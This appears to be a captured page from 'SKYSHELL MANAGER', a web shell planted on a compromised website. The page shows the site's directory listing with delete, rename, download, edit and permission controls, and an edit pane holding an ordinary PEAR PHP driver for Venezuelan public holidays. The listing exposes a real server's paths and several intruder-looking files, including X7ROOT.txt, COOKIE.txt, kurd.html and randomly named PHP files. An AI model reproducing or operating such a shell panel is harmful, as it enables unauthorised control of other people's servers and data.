📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: Venezuela.php
<?php /* vim: set expandtab tabstop=4 shiftwidth=4: */ /** * Driver for holidays in Venezuela * * PHP Version 4 * * @category Date * @package Date_Holidays * @author Alan Mizrahi * @license BSD http://www.opensource.org/licenses/bsd-license.php * @version 0.0.1 * @link http://pear.php.net/package/Date_Holidays */ /** * Extends Christian Driver */ require_once 'Date/Holidays/Driver/Christian.php'; /** * Driver class that calculates holidays in Venezuela * * @category Date * @package Date_Holidays * @subpackage Driver * @author Alan Mizrahi * @license BSD http://www.opensource.org/licenses/bsd-license.php * @version 0.0.1 * @link http://pear.php.net/package/Date_Holidays */ class Date_Holidays_Driver_Venezuela extends Date_Holidays_Driver_Christian { /** * Constructor * * Use the Date_Holidays::factory() method to construct an object of a * certain driver * * @access protected */ function Date_Holidays_Driver_Venezuela() { } /** * Build the internal arrays that contain data about the calculated holidays * * @access protected * @return boolean true on success, otherwise a PEAR_ErrorStack object * @throws object PEAR_ErrorStack */ function _buildHolidays() { parent::_buildHolidays(); // We need a few specific christian holidays // before clearing the list of holidays $ashWednesdayDate = $this->getHolidayDate('ashWednesday'); $greenThursday = $this->getHolidayDate('greenThursday'); $goodFridayDate = $this->getHolidayDate('goodFriday'); $this->_clearHolidays(); $this->_addHoliday( 'newYearsDay', $this->_year . '-01-01', 'New Year\'s Day' ); $this->_addTranslationForHoliday('newYearsDay', 'es_VE', 'Año Nuevo'); // carnaval $carnival = new Date($ashWednesdayDate); $carnival = $carnival->getPrevDay(); $this->_addHoliday('carnival2', $carnival, 'Carnival'); $carnival = $carnival->getPrevDay(); $this->_addHoliday('carnival1', $carnival, 'Carnival'); $this->_addTranslationForHoliday('carnival1', 'es_VE', 'Carnaval'); $this->_addTranslationForHoliday('carnival2', 'es_VE', 'Carnaval'); // semana santa $this->_addHoliday('holyweek1', $greenThursday, 'Holy Week'); $this->_addHoliday('holyweek2', $goodFridayDate, 'Holy Week'); $this->_addTranslationForHoliday('holyweek1', 'es_VE', 'Semana Santa'); $this->_addTranslationForHoliday('holyweek2', 'es_VE', 'Semana Santa'); $this->_addHoliday( 'independenceMovementDay', $this->_year . '-04-19', 'Independence Declaration' ); $this->_addTranslationForHoliday( 'independenceMovementDay', 'es_VE', 'Declaración de Independencia' ); $this->_addHoliday('laborDay', $this->_year . '-05-01', 'Labor Day'); $this->_addTranslationForHoliday('laborDay', 'es_VE', 'Día del Trabajador'); $this->_addHoliday( 'battleOfCarabobo', $this->_year . '-06-24', 'Battle of Carabobo' ); $this->_addTranslationForHoliday( 'battleOfCarabobo', 'es_VE', 'Día de la Batalla de Carabobo' ); $this->_addHoliday( 'independenceDay', $this->_year . '-07-05', 'Independence Day' ); $this->_addTranslationForHoliday( 'independenceDay', 'es_VE', 'Día de Independencia' ); $this->_addHoliday( 'bolivarBirthday', $this->_year . '-07-24', 'Birthday of Simon Bolivar' ); $this->_addTranslationForHoliday( 'bolivarBirthday', 'es_VE', 'Natalicio de Simón Bolívar' ); $this->_addHoliday('columbosDay', $this->_year . '-10-12', 'Columbos Day'); $this->_addTranslationForHoliday('columbosDay', 'es_VE', 'Día de la Raza'); $this->_addHoliday('christmas', $this->_year . '-12-25', 'Christmas'); $this->_addTranslationForHoliday('christmas', 'es_VE', 'Navidad'); return true; } /** * Method that returns an array containing the ISO3166 codes that may possibly * identify a driver. * * @static * @access public * @return array possible ISO3166 codes */ function getISO3166Codes() { return array('ve', 'ven'); } /** * clear all holidays * * @access private * @return void */ function _clearHolidays() { $this->_holidays = array(); $this->_internalNames = array(); $this->_dates = array(); $this->_titles = array(); } } ?>
Save